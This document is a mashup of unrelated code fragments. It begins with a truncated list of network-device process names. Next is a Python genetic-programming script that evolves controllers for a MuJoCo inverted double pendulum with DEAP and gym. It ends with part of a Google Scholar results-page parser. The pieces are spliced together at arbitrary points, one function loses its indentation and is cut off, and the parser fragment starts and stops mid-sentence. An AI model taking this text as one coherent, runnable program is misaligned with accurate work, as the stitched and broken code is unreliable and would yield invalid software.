'LSP Verification',
'RIB LM VALIDATE',
'SSM connection m',
'SSS Manager',
'SSS Policy Manag',
'SSS Feature Mana',
'SSS Feature Time',
'Spanning Tree',
'VRRS',
'Ethernet LMI',
'Ethernet OAM Pro',
'Ethernet CFM',
'mcp callhome per',
'PPCP RP Stats Ba',
'Appnav auto disc',
'L2FIB Timer Disp',
'MLRIB L2 Msg Thr',
'Spanning Tree St',
'IGMP Route Msg H',
'IGMP | |
<reponame>ferreirajoaouerj/gp-openai-gym
#-*- coding:utf-8 -*-
"""
Documentation
"""
######################################################################################################
import os
import pickle
import time
import copy
from collections import defaultdict
import random
import operator
import numpy as np
from deap import base
from deap import creator
from deap import gp
from deap import tools
from deap import algorithms
import matplotlib.pyplot as plt
from matplotlib import colors
import networkx as nx
import gym
import pybulletgym
######################################################################################################
#################################### PARAMETERS ######################################################
######################################################################################################
random.seed(0)  # fixed seed so GP runs are reproducible
# Genetic-programming hyperparameters.
param_pg = {
    'tam_pop': 500,        # population size
    'pb_cx': 0.75,         # crossover probability
    'pb_mut': 0.05,        # mutation probability
    'n_geracoes': 15,      # number of generations
    'tipo_apt': 1.0,       # fitness weight (positive -> maximization)
    'n_entradas': 11,      # number of controller inputs (observations)
    'faixa_cst': [-1, 1],  # range for ephemeral random constants
    'n_episodios': 10,     # episodes averaged per fitness evaluation
    'camp_apt': 6,         # tournament size (fitness) -- presumably double tournament; confirm
    'camp_d': 1.2,         # tournament parsimony parameter -- presumably size tournament; confirm
    'd_min': 2,            # min depth of initial trees
    'd_max': 5,            # max depth of initial trees
    'max_d_mut': 7,        # max depth of mutation subtrees
    'limite_d': 17,        # hard depth limit on evolved trees
}
# Experiment-level settings (shared environment, run count).
param_aux = {
    'n_exec': 10,  # number of independent GP executions
    'amb': gym.make('InvertedDoublePendulumMuJoCoEnv-v0'),  # shared gym env
    'mujoco': True  # MuJoCo-style envs render differently (see avaliar_individuo)
}
# Plotting configuration: LaTeX labels for the observation variables
# (index order matches ARG0..ARG10), operator symbols, and histogram bins.
param_graf = {
    'nomes_var_tex': (r"$s$", r'$\sin{(\theta)}$', r'$\sin{(\gamma)}$', r'$\cos{(\theta)}$', r'$\cos{(\gamma)}$',
                      r'$\dot{s}$', r'$\dot{\theta}$', r'$\dot{\gamma}$',
                      r'$f_r(s)$', r'$f_r(\theta)$', r'$f_r(\gamma)$'),
    'plot_var': ('Ação', r"$s$", r'$\sin{(\theta)}$', r'$\sin{(\gamma)}$'),
    'operadores': {'add': r'$+$', 'sub': r'$-$', 'mul': r'$\times$', 'div': r'$\div$',
                   'gt': r'$>$', 'sr': r'$\sqrt{\,}$', 'sen': r'$\sin$', 'sgn': 'sgn',
                   'constante': r'$R$'},
    'hist_n_linhas': 3,   # histogram grid rows
    'hist_n_cols': 2,     # histogram grid columns
    'bins_min': 0,
    'bins_max': 11000,
    'bins_passo': 1000    # bin step
}
# Mutable counters updated during evaluation (see avaliar_individuo).
var_aux = {
    'n_dt': 0,     # total environment steps taken
    'n_simul': 0,  # total episodes simulated
    't_exec': 0    # execution-time accumulator
}
# Bundle of all parameter groups, pickled alongside the run statistics.
param_store = {
    'pg': param_pg,
    'aux': param_aux,
    'graf': param_graf,
    'var_aux': var_aux
}
# Statistics are stored next to this script, e.g. foo.py -> foo_Stats.pkl.
script_filename = os.path.basename(__file__)
store_filename = script_filename.replace(".py", "_Stats.pkl")
######################################################################################################
################################ HELPER FUNCTIONS - INDIVIDUAL EVALUATION ############################
######################################################################################################
def wrap(num):
    """Clamp a scalar controller output to the action range [-1, 1] and
    return it as the 1-element float32 array the gym environment expects.
    """
    if num >= 1.0:
        value = 1.0
    elif num <= -1.0:
        value = -1.0
    else:
        value = num
    return np.array([value], dtype='float32')
def calc_custo_inst(obs=None, recomp=None, last=None):
    """Instantaneous-cost hook; this experiment applies no per-step penalty.

    Parameters are accepted for interface compatibility and ignored.
    :return: 0
    """
    return 0
def calc_custo_acum(obs=None, recomp=None, ult_obs=None):
    """Accumulated-cost increment hook: simply the environment reward.

    :param recomp: reward returned by the environment for the last step
    :return: the amount added to the running total each step
    """
    return recomp
def calc_custo(custo_inst=None, custo_acum=None, obs=None, recomp=None):
    """Final episode-fitness hook: the accumulated reward, unchanged.

    :return: custo_acum
    """
    return custo_acum
def avaliar_individuo(ind, num_episodios=param_pg['n_episodios'], num_entradas=param_pg['n_entradas'],
                      ambiente=param_aux['amb'], nomes_var=param_graf['nomes_var_tex'],
                      plotar_var=param_graf['plot_var'], graficos=False, video=False, mujoco=param_aux['mujoco']):
    """Evaluate a GP individual by using its compiled tree as a controller.

    Runs ``num_episodios`` episodes in ``ambiente``, feeding each observation
    vector to the compiled function and clamping its output with ``wrap``.
    Returns the mean accumulated reward as a 1-tuple (DEAP fitness format).
    When ``graficos``/``video`` is set, only a single episode is run and the
    recorded variables are plotted.
    """
    aptidoes = []
    tempo = 0
    dic_stats = {'Tempo': [], 'Resultado': [], 'Acao': [], 'Custo Acumulado': []}
    # ``toolbox`` is the module-level DEAP toolbox configured elsewhere.
    funcao_de_controle = toolbox.compilar_individuo(ind)
    for obs in range(num_entradas):
        dic_stats['ARG' + str(obs)] = []
    if graficos or video:
        num_episodios = 1
    # if mujoco and video:
    #     ambiente.render()
    for episodio in range(num_episodios):
        var_aux['n_simul'] += 1
        tempo_ep = 0
        custo_acumulado = custo_instantaneo = 0
        termino = False
        observacao = ambiente.reset()
        while not termino:
            var_aux['n_dt'] += 1
            tempo_ep += 1
            # The tree is a function of the unpacked observation vector.
            resultado = funcao_de_controle(*tuple(observacao))
            acao = wrap(resultado)
            observacao, recompensa, termino, info = ambiente.step(acao)
            custo_instantaneo = calc_custo_inst()
            custo_acumulado += calc_custo_acum(recomp=recompensa)
            custo = calc_custo(custo_acum=custo_acumulado)
            if video and not mujoco:
                ambiente.render()
            if graficos:
                tempo += 1
                dic_stats['Tempo'].append(tempo), dic_stats['Resultado'].append(resultado),
                dic_stats['Acao'].append(acao), dic_stats['Custo Acumulado'].append(custo_acumulado)
                for obs in range(num_entradas):
                    dic_stats['ARG' + str(obs)].append(observacao[obs])
        aptidoes.append(custo)
    aptidao_media = np.average(aptidoes)
    if graficos:
        plotar_vars_avaliacao_melhor(data=dic_stats, nomes_var=nomes_var,
                                     plotar_var=plotar_var, tempo_final=500)
    if not mujoco:
        ambiente.close()
    # Trailing comma: DEAP expects fitness values as a tuple.
    return aptidao_media,
######################################################################################################
############################# HELPER FUNCTIONS - STATISTICS COMPILATION ##############################
######################################################################################################
def get_data(l):
    """Return the values of *l* with NaN entries removed, as a new list."""
    return [value for value in l if not np.isnan(value)]
def minimo(lista):
    """Return the smallest non-NaN value of *lista*."""
    valores = np.asarray(lista)
    return np.min(valores[~np.isnan(valores)])
def maximo(lista):
    """Return the largest non-NaN value of *lista*."""
    valores = np.array(lista)
    validos = valores[~np.isnan(valores)]
    return np.max(validos)
def media(lista):
    """Return the mean of the non-NaN values of *lista*."""
    valores = np.array(lista)
    validos = valores[~np.isnan(valores)]
    return np.average(validos)
def desvio(lista):
    """Return the (population) standard deviation of the non-NaN values."""
    valores = np.array(lista)
    validos = valores[~np.isnan(valores)]
    return np.std(validos)
def copiar_estatisticas(logbk=None):
    """Copy the per-chapter statistics of a DEAP logbook into a plain dict.

    Parameters
    ----------
    logbk : deap.tools.Logbook
        Logbook with chapters. Despite the default, ``None`` is not a
        usable value; the default is kept only for backward compatibility.

    Returns
    -------
    dict
        ``{chapter: {'max': [...], 'min': [...], 'media': [...],
        'desvio': [...], 'ocorrencias': [...], 'gen': [...]}}``.
    """
    newdic = {}
    # Single pass: the original first built empty dicts for every chapter
    # and then filled them in a second, redundant loop over the same keys.
    for key in logbk.chapters.keys():
        chapter = logbk.chapters[key]
        newdic[key] = {
            'max': chapter.select('max'),
            'min': chapter.select('min'),
            'media': chapter.select('media'),
            'desvio': chapter.select('desvio'),
            'ocorrencias': chapter.select('ocorrencias'),
            'gen': logbk.select('gen'),
        }
    return newdic
def contar_operadores(conjprim, pop):
    """Count how often each primitive, argument and constant appears in *pop*.

    Parameters
    ----------
    conjprim
        GP primitive set exposing ``primitives[object]`` (operator nodes
        with a ``name``) and ``arguments`` ('ARGn' input names).
    pop : iterable
        Population of tree individuals; each node has ``name`` and, for
        terminals, ``value``.

    Returns
    -------
    tuple(dict, list)
        Occurrence count per node label (ephemeral constants pooled under
        ``'constante'``), and the list of constant values encountered.
    """
    op_count_dict = {'constante': 0}
    valores_constantes = []
    # Pre-seed every known operator and input argument with a zero count.
    # Idiom fix: 'x not in d' replaces 'not d.keys().__contains__(x)'.
    for op in conjprim.primitives[object]:
        if op.name not in op_count_dict:
            op_count_dict[op.name] = 0
    for arg in conjprim.arguments:
        if arg not in op_count_dict:
            op_count_dict[arg] = 0
    for individuo in pop:
        for no in individuo:
            if 'ARG' not in no.name:
                if no.name not in op_count_dict:
                    # Unknown name: an ephemeral constant terminal.
                    op_count_dict['constante'] += 1
                    valores_constantes.append(no.value)
                else:
                    op_count_dict[no.name] += 1
            else:
                # Input terminals are counted under their value ('ARGn').
                op_count_dict[no.value] += 1
    return op_count_dict, valores_constantes
def media_estatisticas(stat_dic_list: list, occ_dic_list: list, const_list: list):
    """Average statistics, occurrence counts and constants across runs.

    Parameters
    ----------
    stat_dic_list : list of dict
        One statistics dict per run (shape of copiar_estatisticas() output);
        the subkeys averaged come from the module-level ``estatisticas``
        mapping. NOTE: mutated in place (inner lists become numpy arrays).
    occ_dic_list : list of dict
        One operator-occurrence dict per run (see contar_operadores).
        Also mutated in place.
    const_list : list of list
        Per-run lists of ephemeral-constant values.

    Returns
    -------
    tuple
        (averaged statistics dict, averaged occurrence dict,
        mean constant value across runs).
    """
    # Convert every series to a numpy array so elementwise '+' sums them.
    for stat_dict in stat_dic_list:
        for key in stat_dict.keys():
            for subkey in estatisticas[key]:
                stat_dict[key][subkey] = np.array(stat_dict[key][subkey])
    for occ_dic in occ_dic_list:
        for key in occ_dic.keys():
            occ_dic[key] = np.array(occ_dic[key])
    # Accumulate elementwise sums starting from a deep copy of run 0.
    sum_dict = copy.deepcopy(stat_dic_list[0])
    occ_sum = copy.deepcopy(occ_dic_list[0])
    for stat_dict in stat_dic_list[1:]:
        for key in stat_dict.keys():
            for subkey in estatisticas[key]:
                sum_dict[key][subkey] += stat_dict[key][subkey]
    # Divide by the number of runs to get per-generation means.
    for key in sum_dict.keys():
        for subkey in sum_dict[key].keys():
            sum_dict[key][subkey] = sum_dict[key][subkey] / len(stat_dic_list)
    for occ_dic in occ_dic_list[1:]:
        for key in occ_dic.keys():
            occ_sum[key] += occ_dic[key]
    for key in occ_sum.keys():
        occ_sum[key] = occ_sum[key] / len(occ_dic_list)
    # Average each run's constants, then average those averages
    # (runs that produced no constants contribute 0).
    const_avg_list = []
    for cst_lst in const_list:
        if len(cst_lst) < 1:
            const_avg_list.append(0)
        else:
            const_avg_list.append(np.average(cst_lst))
    const_avg = np.average(const_avg_list)
    return sum_dict, occ_sum, const_avg
def calcular_media_exec(lista_dic_stats, lista_dic_occ, lista_lista_const):
    """Average statistics/occurrences/constants over multiple executions,
    histogramming the per-generation fitness occurrences.

    Similar in spirit to media_estatisticas(), but the
    'aptidao'/'ocorrencias' series is binned with the configured bins
    instead of being averaged elementwise.

    Returns
    -------
    tuple
        (averaged statistics dict, averaged occurrence dict,
        mean constant value).
    """
    bins = np.arange(param_graf['bins_min'], param_graf['bins_max'], param_graf['bins_passo'])
    n_mat_list = []
    # occ_mat = np.ndarray(shape=(param_pg['n_geracoes'] + 1, param_pg['tam_pop']))
    occ_mat = []
    for dic_stats in lista_dic_stats:
        for key in dic_stats.keys():
            for subkey in dic_stats[key].keys():
                if subkey != 'ocorrencias':
                    dic_stats[key][subkey] = np.array(dic_stats[key][subkey], dtype='float64')
                elif key == 'aptidao' and subkey == 'ocorrencias':
                    # One histogram (bin-count vector) per generation of this run.
                    occ_mat = []
                    for ger, lista_occ in enumerate(dic_stats[key][subkey]):
                        # NOTE(review): np.histogram rebinds 'bins' to the
                        # returned edge array on every iteration -- confirm
                        # this is intended rather than reusing the original.
                        n, bins = np.histogram(lista_occ, bins=bins)
                        occ_mat.append(n)
                    n_mat_list.append(occ_mat)
    # Elementwise sum of the per-run histogram matrices.
    mat_acum = np.asarray(n_mat_list[0])
    for mat in n_mat_list[1:]:
        mat_acum += np.asarray(mat)
    n_avg = []
    # NOTE(review): the range runs over the columns of mat_acum but the body
    # indexes its rows (mat_acum[i]) -- looks inconsistent; verify intent.
    for i in range(len(mat_acum[0])):
        n_avg.append(mat_acum[i] / len(n_mat_list))
    # Resample representative fitness values uniformly inside each bin.
    # NOTE(review): random.randint expects integer bounds; the 'bins' edges
    # produced by np.arange may be floats -- confirm.
    new_apt_ocorrencias = []
    for i in range(len(n_avg)):
        new_apt_ocorrencias.append([])
        for j in range(len(n_avg[i])):
            new_apt_ocorrencias[i].append(random.randint(bins[i], bins[i + 1]))
    lista_lista_const = np.array([np.array(x) for x in lista_lista_const])
    dic_stats_acum = copy.deepcopy(lista_dic_stats[0])
    dic_occ_acum = copy.deepcopy(lista_dic_occ[0])
    const_acum = 0
    n = len(lista_lista_const)
    # Sum the non-histogram statistics across runs, then divide by run count.
    for dic_stats in lista_dic_stats[1:]:
        for key in dic_stats.keys():
            for subkey in dic_stats[key]:
                if subkey != 'ocorrencias':
                    dic_stats_acum[key][subkey] = np.add(dic_stats_acum[key][subkey],
                                                         dic_stats[key][subkey])
    for key in dic_stats_acum.keys():
        for subkey in dic_stats_acum[key].keys():
            if subkey != 'ocorrencias':
                dic_stats_acum[key][subkey] = dic_stats_acum[key][subkey] / n
    dic_stats_media = dic_stats_acum
    # Same accumulate-then-divide averaging for the occurrence dicts.
    for dic_occ in lista_dic_occ[1:]:
        for key in dic_occ.keys():
            dic_occ_acum[key] += dic_occ[key]
    for label in dic_occ_acum.keys():
        dic_occ_acum[label] = dic_occ_acum[label] / n
    dic_occ_media = dic_occ_acum
    # Mean constant value over runs that produced constants (NaNs zeroed).
    for lista_const in lista_lista_const:
        if len(lista_const) > 0:
            const_acum += np.average(np.nan_to_num(lista_const))
    const_med = const_acum / n
    return dic_stats_media, dic_occ_media, const_med
######################################################################################################
############################# FUNÇÕES AUXILIARES - GERAÇÃO DE GRÁFICOS ###############################
######################################################################################################
def plotar_arvore(ind):
    """Draw a GP individual's expression tree with networkx + graphviz.

    Operator names and 'ARGn' placeholders are replaced by their display
    names from param_graf before drawing. Uses the nx_agraph 'dot' layout
    (requires pygraphviz).
    """
    plt.figure()
    nodes, edges, labels = gp.graph(ind)
    # Replace raw operator names with their pretty-print equivalents.
    for label_key, label_value in labels.items():
        for op_key, op_value in param_graf['operadores'].items():
            if str(label_value) == op_key:
                labels[label_key] = op_value
    # Replace 'ARGn' input placeholders with the configured variable names.
    for i in range(param_pg['n_entradas']):
        for key, value in labels.items():
            if value == ('ARG' + str(i)):
                labels[key] = param_graf['nomes_var_tex'][i]
    g = nx.Graph()
    g.add_nodes_from(nodes)
    g.add_edges_from(edges)
    # 'dot' produces the usual top-down tree layout.
    pos = nx.drawing.nx_agraph.graphviz_layout(g, prog="dot")
    nx.draw_networkx_nodes(g, pos, node_size=900, node_color='black')
    nx.draw_networkx_edges(g, pos)
    nx.draw_networkx_labels(g, pos, labels, font_color='white', font_size=10)
    plt.show()
def plotar_vars_avaliacao(data=None, nomes_var=None, plotar_var=None, tempo_final=None):
    """Plot the time series collected during an evaluation episode.

    Parameters
    ----------
    data : dict
        Series keyed by 'Tempo', 'Resultado', 'Acao', 'Custo Acumulado' and
        'ARGn' (as built by avaliar_individuo). Keys are renamed in place
        to their display names.
    nomes_var : list of str
        Display names for the 'ARGn' observation series.
    plotar_var : list of str
        Which (renamed) series to plot, one stacked subplot each.
    tempo_final : int
        Upper x-axis limit (multi-subplot case).
    """
    figura, eixo = plt.subplots(nrows=len(plotar_var), ncols=1, sharex='all')
    # Rename keys to display names (mutates the caller's dict).
    data['Ação'] = data.pop('Acao')
    for n in range(len(nomes_var)):
        data[nomes_var[n]] = data.pop('ARG' + str(n))
    if len(plotar_var) < 2:
        # Single subplot: plt.subplots returns a bare Axes, not an array.
        eixo.plot('Tempo', plotar_var[0], data=data, ls='-.', marker='o', ms=5, color='blue', alpha=0.5)
        eixo.set_xlabel('Tempo')
        eixo.set_ylabel(plotar_var[0])
        eixo.grid()
    else:
        cores = ['b', 'g', 'r', 'm', 'c']
        for var in range(len(plotar_var)):
            eixo[var].plot('Tempo', plotar_var[var], data=data, ls='-.', marker='o', ms=5, color=cores[var], alpha=0.5)
            eixo[var].set_ylabel(plotar_var[var])
            eixo[var].grid(True)
        eixo[-1].set_xlabel('Tempo')  # x label only on the last subplot
        eixo[-1].set_xlim(0, tempo_final)
def plotar_vars_avaliacao_melhor(data=None, nomes_var=None, plotar_var=None, tempo_final=1000):
    """Plot evaluation time series for the best individual.

    Same layout as plotar_vars_avaliacao(), but with a solid line, smaller
    markers, and a default x-axis span of 1000 steps.
    """
    figura, eixo = plt.subplots(nrows=len(plotar_var), ncols=1, sharex='all')
    # Rename keys to display names (mutates the caller's dict).
    data['Ação'] = data.pop('Acao')
    for n in range(len(nomes_var)):
        data[nomes_var[n]] = data.pop('ARG' + str(n))
    if len(plotar_var) < 2:
        # Single subplot: plt.subplots returns a bare Axes, not an array.
        eixo.plot('Tempo', plotar_var[0], data=data, ls='-', marker='.', ms=3, color='blue', alpha=0.5)
        eixo.set_xlabel('Tempo')
        eixo.set_ylabel(plotar_var[0])
        eixo.grid()
    else:
        cores = ['b', 'g', 'r', 'm', 'c']
        for var in range(len(plotar_var)):
            eixo[var].plot('Tempo', plotar_var[var], data=data, ls='-', marker='.', ms=3, color=cores[var], alpha=0.5)
            eixo[var].set_ylabel(plotar_var[var])
            eixo[var].grid(True)
        eixo[-1].set_xlabel('Tempo')  # x label only on the last subplot
        eixo[-1].set_xlim(0, tempo_final)
def plotar_hits(data=None, nrows=param_graf['hist_n_linhas'], ncols=param_graf['hist_n_cols'],
                bins_min=param_graf['bins_min'], bins_max=param_graf['bins_max'], bins_step=param_graf['bins_passo']):
    """Plot a grid of fitness histograms sampled across generations.

    Parameters
    ----------
    data : dict
        Statistics dict; uses data['aptidao']['ocorrencias'], one list of
        fitness values per generation.
    nrows, ncols : int
        Grid shape; nrows*ncols generations are sampled evenly over the run.
    bins_min, bins_max, bins_step : float
        Histogram bin specification.
    """
    fig, eixo = plt.subplots(nrows=nrows, ncols=ncols, sharex='all', sharey='all', constrained_layout=True)
    norm = colors.Normalize(bins_min, bins_max - bins_step)
    dados = data['aptidao']['ocorrencias']
    # Pick nrows*ncols generation indices evenly spread over the run.
    graf = (np.round(np.linspace(0, len(dados) - 1, nrows * ncols))).astype('int')
    n = 0
    for j in range(ncols):
        for i in range(nrows):
            N, bins, patches = eixo[i][j].hist(dados[graf[n]], bins=np.arange(bins_min, bins_max, bins_step))
            # Color each bar by its bin position (viridis gradient).
            for thisbin, thispatch in zip(bins, patches):
                color = plt.cm.viridis(norm(thisbin))
                thispatch.set_facecolor(color)
            eixo[i][j].set_title('Geração ' + str(graf[n]))
            # BUG FIX: the original used 'is' for integer comparison, which
            # relies on CPython small-int caching and raises a SyntaxWarning
            # on Python >= 3.8; '==' compares by value.
            if j == 0:
                eixo[i][j].set_ylabel('Ocorrencias')
            if i == nrows - 1:
                eixo[i][j].set_xlabel('Aptidão')
            n += 1
def plotar_estatisticas_evolucao(data=None):
    """Plot min/max/mean evolution curves for fitness, length and complexity.

    Parameters
    ----------
    data : dict
        Statistics dict keyed by 'aptidao', 'comprimento', 'complexidade';
        each entry maps 'gen'/'min'/'max'/'media'/'desvio' to series. One
        figure is produced per statistic; the fitness figure additionally
        shades the +/- standard-deviation band.
    """
    # Renamed from the original, which reused the list names 'stats' and
    # 'labels' as the loop variables, shadowing them.
    stat_keys = ['aptidao', 'comprimento', 'complexidade']
    stat_labels = ['Aptidão', 'Comprimento', 'Complexidade']
    ls = '-.'
    lw = 1
    ms = 7
    for stat, label in zip(stat_keys, stat_labels):
        fig, eixo = plt.subplots()
        fig.suptitle(stat.capitalize() + ' por Geração', fontsize=14)
        eixo.plot('gen', 'min', 'bv:', data=data[stat], label=label + ' Min', ls=ls, markersize=ms, lw=lw)
        eixo.plot('gen', 'max', 'r^:', data=data[stat], label=label + ' Max', ls=ls, markersize=ms, lw=lw)
        eixo.plot('gen', 'media', 'g>:', data=data[stat], label=label + ' Med', ls=ls, markersize=ms, lw=lw)
        eixo.set_xlabel('Geração')
        eixo.set_ylabel(stat.capitalize())
        # BUG FIX: the original compared strings with 'is' (identity), which
        # is implementation-dependent; '==' compares by value.
        if stat == 'aptidao':
            fig.suptitle('Aptidão por Geração', fontsize=14)
            apt = data[stat]
            # Shade the mean +/- standard deviation band.
            eixo.fill_between('gen', [x + y for x, y in zip(apt['media'], apt['desvio'])],
                              [x - y for x, y in zip(apt['media'], apt['desvio'])], data=apt, label='Desvio Padrão',
                              alpha=0.2, edgecolor='#1B2ACC', facecolor='#089FFF', linewidth=0.1,
                              linestyle='dashed', antialiased=True)
            eixo.set_ylabel('Aptidão')
        eixo.legend(loc='best')
        plt.xlim(-0.1, len(data[stat]['gen']) - 0.9)
        eixo.grid()
def plotar_ocorrencias(data=None):
    """Bar chart of node-label occurrence counts with a gradient fill.

    Keys are first renamed: 'ARGn' becomes the configured variable name and
    raw operator names become their display names from param_graf.
    """
    newdic = copy.deepcopy(data)
    for i in range(param_pg['n_entradas']):
        newdic[param_graf['nomes_var_tex'][i]] = newdic.pop('ARG' + str(i))
    for key in data.keys():
        if param_graf['operadores'].__contains__(key):
            newdic[param_graf['operadores'][key]] = newdic.pop(key)
    fig, eixo = plt.subplots()
    bars = plt.bar(*zip(*newdic.items()))
    ax = bars[0].axes
    lim = ax.get_xlim() + ax.get_ylim()
    # Replace each solid bar with an image gradient clipped to the bar's
    # rectangle; the bar's height relative to the tallest bar sets how far
    # up the gradient runs.
    for bar in bars:
        bar.set_zorder(1)
        bar.set_facecolor("none")
        x, y = bar.get_xy()
        w, h = bar.get_width(), bar.get_height()
        grad = np.atleast_2d(np.linspace(0, h / max(data.values()), 256))
        eixo.imshow(grad.transpose(), extent=[x, x + w, y + h, y], aspect="auto", zorder=0,
                    norm=colors.NoNorm(vmin=0, vmax=1))
    # Restore the original axis limits (imshow changes them).
    ax.axis(lim)
def avaliar_hdf(hdf, env):
aptidoes = []
for ind in hdf[:10]:
aptidao, = avaliar_individuo(ind, num_episodios=100, ambiente=env)
aptidoes.append(aptidao)
aptidao_media_melhores = np.sum(aptidoes) / len(aptidoes)
| |
a user-suitable label for the item, and (3) an
# ordering index:
self.attrs = {
'title': [None, 'Title', 0],
'url': [None, 'URL', 1],
'year': [None, 'Year', 2],
'num_citations': [0, 'Citations', 3],
'num_versions': [0, 'Versions', 4],
'cluster_id': [None, 'Cluster ID', 5],
'url_pdf': [None, 'PDF link', 6],
'url_citations': [None, 'Citations list', 7],
'url_versions': [None, 'Versions list', 8],
'url_citation': [None, 'Citation link', 9],
'excerpt': [None, 'Excerpt', 10],
}
# The citation data in one of the standard export formats,
# e.g. BibTeX.
self.citation_data = None
def __getitem__(self, key):
if key in self.attrs:
return self.attrs[key][0]
return None
    def __len__(self):
        # Number of attributes currently tracked for this article.
        return len(self.attrs)
def __setitem__(self, key, item):
if key in self.attrs:
self.attrs[key][0] = item
else:
self.attrs[key] = [item, key, len(self.attrs)]
def __delitem__(self, key):
if key in self.attrs:
del self.attrs[key]
    def set_citation_data(self, citation_data):
        # Store the citation payload in its export format (e.g. BibTeX).
        self.citation_data = citation_data
def as_txt(self):
# Get items sorted in specified order:
items = sorted(list(self.attrs.values()), key=lambda item: item[2])
# Find largest label length:
max_label_len = max([len(str(item[1])) for item in items])
fmt = '%%%ds %%s' % max_label_len
res = []
for item in items:
if item[0] is not None:
res.append(fmt % (item[1], item[0]))
return '\n'.join(res)
    def as_csv(self, header=False, sep='|'):
        """Render the article as one separator-joined row (plus optional header).

        NOTE(review): relies on a module-level ``unicode`` name -- presumably
        aliased to ``str`` on Python 3 near the top of the file; confirm.
        """
        # Get keys sorted in specified order:
        keys = [pair[0] for pair in \
                sorted([(key, val[2]) for key, val in list(self.attrs.items())],
                       key=lambda pair: pair[1])]
        res = []
        if header:
            res.append(sep.join(keys))
        res.append(sep.join([unicode(self.attrs[key][0]) for key in keys]))
        return '\n'.join(res)
    def as_citation(self):
        """
        Reports the article in a standard citation format. This works only
        if you have configured the querier to retrieve a particular
        citation export format. (See ScholarSettings.)
        """
        # Empty string when no citation data was fetched.
        return self.citation_data or ''
class ScholarArticleParser(object):
    """
    ScholarArticleParser can parse HTML document strings obtained from
    Google Scholar. This is a base class; concrete implementations
    adapting to tweaks made by Google over time follow below.
    """
    def __init__(self, site=None):
        # Parsed BeautifulSoup tree and the article currently being built.
        self.soup = None
        self.article = None
        # Base site URL used to absolutize relative result paths.
        self.site = site or ScholarConf.SCHOLAR_SITE
        # Matches a plausible publication year (19xx/20xx) as a whole word.
        self.year_re = re.compile(r'\b(?:20|19)\d{2}\b')

    def handle_article(self, art):
        """
        The parser invokes this callback on each article parsed
        successfully. In this base class, the callback does nothing.
        """

    def handle_num_results(self, num_results):
        """
        The parser invokes this callback if it determines the overall
        number of results, as reported on the parsed results page. The
        base class implementation does nothing.
        """

    def parse(self, html):
        """
        This method initiates parsing of HTML content, cleans resulting
        content as needed, and notifies the parser instance of
        resulting instances via the handle_article callback.
        """
        self.soup = SoupKitchen.make_soup(html)

        # This parses any global, non-itemized attributes from the page.
        self._parse_globals()

        # Now parse out listed articles:
        for div in self.soup.findAll(ScholarArticleParser._tag_results_checker):
            self._parse_article(div)
            self._clean_article()
            if self.article['title']:
                self.handle_article(self.article)

    def _clean_article(self):
        """
        This gets invoked after we have parsed an article, to do any
        needed cleanup/polishing before we hand off the resulting
        article.
        """
        if self.article['title']:
            self.article['title'] = self.article['title'].strip()

    def _parse_globals(self):
        # Extract the total result count from the 'gs_ab_md' header div
        # (text of the form "About 1,234 results").
        tag = self.soup.find(name='div', attrs={'id': 'gs_ab_md'})
        if tag is not None:
            raw_text = tag.findAll(text=True)
            # raw text is a list because the body contains <b> etc
            if raw_text is not None and len(raw_text) > 0:
                try:
                    num_results = raw_text[0].split()[1]
                    # num_results may now contain commas to separate
                    # thousands, strip:
                    num_results = num_results.replace(',', '')
                    num_results = int(num_results)
                    self.handle_num_results(num_results)
                except (IndexError, ValueError):
                    # Header text did not match the expected shape; skip it.
                    pass

    def _parse_article(self, div):
        # Original (pre-2012) layout: title in <div class="gs_rt"><h3><a>,
        # footer links inside <font> -> <span class="gs_fl">.
        self.article = ScholarArticle()

        for tag in div:
            if not hasattr(tag, 'name'):
                continue

            if tag.name == 'div' and self._tag_has_class(tag, 'gs_rt') and \
                    tag.h3 and tag.h3.a:
                self.article['title'] = ''.join(tag.h3.a.findAll(text=True))
                self.article['url'] = self._path2url(tag.h3.a['href'])
                if self.article['url'].endswith('.pdf'):
                    self.article['url_pdf'] = self.article['url']

            if tag.name == 'font':
                for tag2 in tag:
                    if not hasattr(tag2, 'name'):
                        continue
                    if tag2.name == 'span' and \
                            self._tag_has_class(tag2, 'gs_fl'):
                        self._parse_links(tag2)

    def _parse_links(self, span):
        # Extract citation-count, versions and citation-export links from a
        # result's footer element.
        for tag in span:
            if not hasattr(tag, 'name'):
                continue
            if tag.name != 'a' or tag.get('href') is None:
                continue

            if tag.get('href').startswith('/scholar?cites'):
                if hasattr(tag, 'string') and tag.string.startswith('Cited by'):
                    self.article['num_citations'] = \
                        self._as_int(tag.string.split()[-1])

                # Weird Google Scholar behavior here: if the original
                # search query came with a number-of-results limit,
                # then this limit gets propagated to the URLs embedded
                # in the results page as well. Same applies to
                # versions URL in next if-block.
                self.article['url_citations'] = \
                    self._strip_url_arg('num', self._path2url(tag.get('href')))

                # We can also extract the cluster ID from the versions
                # URL. Note that we know that the string contains "?",
                # from the above if-statement.
                args = self.article['url_citations'].split('?', 1)[1]
                for arg in args.split('&'):
                    if arg.startswith('cites='):
                        self.article['cluster_id'] = arg[6:]

            if tag.get('href').startswith('/scholar?cluster'):
                if hasattr(tag, 'string') and tag.string.startswith('All '):
                    self.article['num_versions'] = \
                        self._as_int(tag.string.split()[1])
                self.article['url_versions'] = \
                    self._strip_url_arg('num', self._path2url(tag.get('href')))

            if tag.getText().startswith('Import'):
                self.article['url_citation'] = self._path2url(tag.get('href'))

    @staticmethod
    def _tag_has_class(tag, klass):
        """
        This predicate function checks whether a BeatifulSoup Tag instance
        has a class attribute.
        """
        res = tag.get('class') or []
        if type(res) != list:
            # BeautifulSoup 3 can return e.g. 'gs_md_wp gs_ttss',
            # so split -- conveniently produces a list in any case
            res = res.split()
        return klass in res

    @staticmethod
    def _tag_results_checker(tag):
        # True for result containers: <div class="gs_r">.
        return tag.name == 'div' \
            and ScholarArticleParser._tag_has_class(tag, 'gs_r')

    @staticmethod
    def _as_int(obj):
        # Best-effort int conversion; None when the text is not numeric.
        try:
            return int(obj)
        except ValueError:
            return None

    def _path2url(self, path):
        """Helper, returns full URL in case path isn't one."""
        # NOTE(review): only 'http://' is recognized as absolute; an https
        # URL would get self.site prepended -- confirm this is intended.
        if path.startswith('http://'):
            return path
        if not path.startswith('/'):
            path = '/' + path
        return self.site + path

    def _strip_url_arg(self, arg, url):
        """Helper, removes a URL-encoded argument, if present."""
        parts = url.split('?', 1)
        if len(parts) != 2:
            return url
        res = []
        for part in parts[1].split('&'):
            if not part.startswith(arg + '='):
                res.append(part)
        return parts[0] + '?' + '&'.join(res)
class ScholarArticleParser120201(ScholarArticleParser):
    """
    This class reflects an update to the Scholar results page layout that
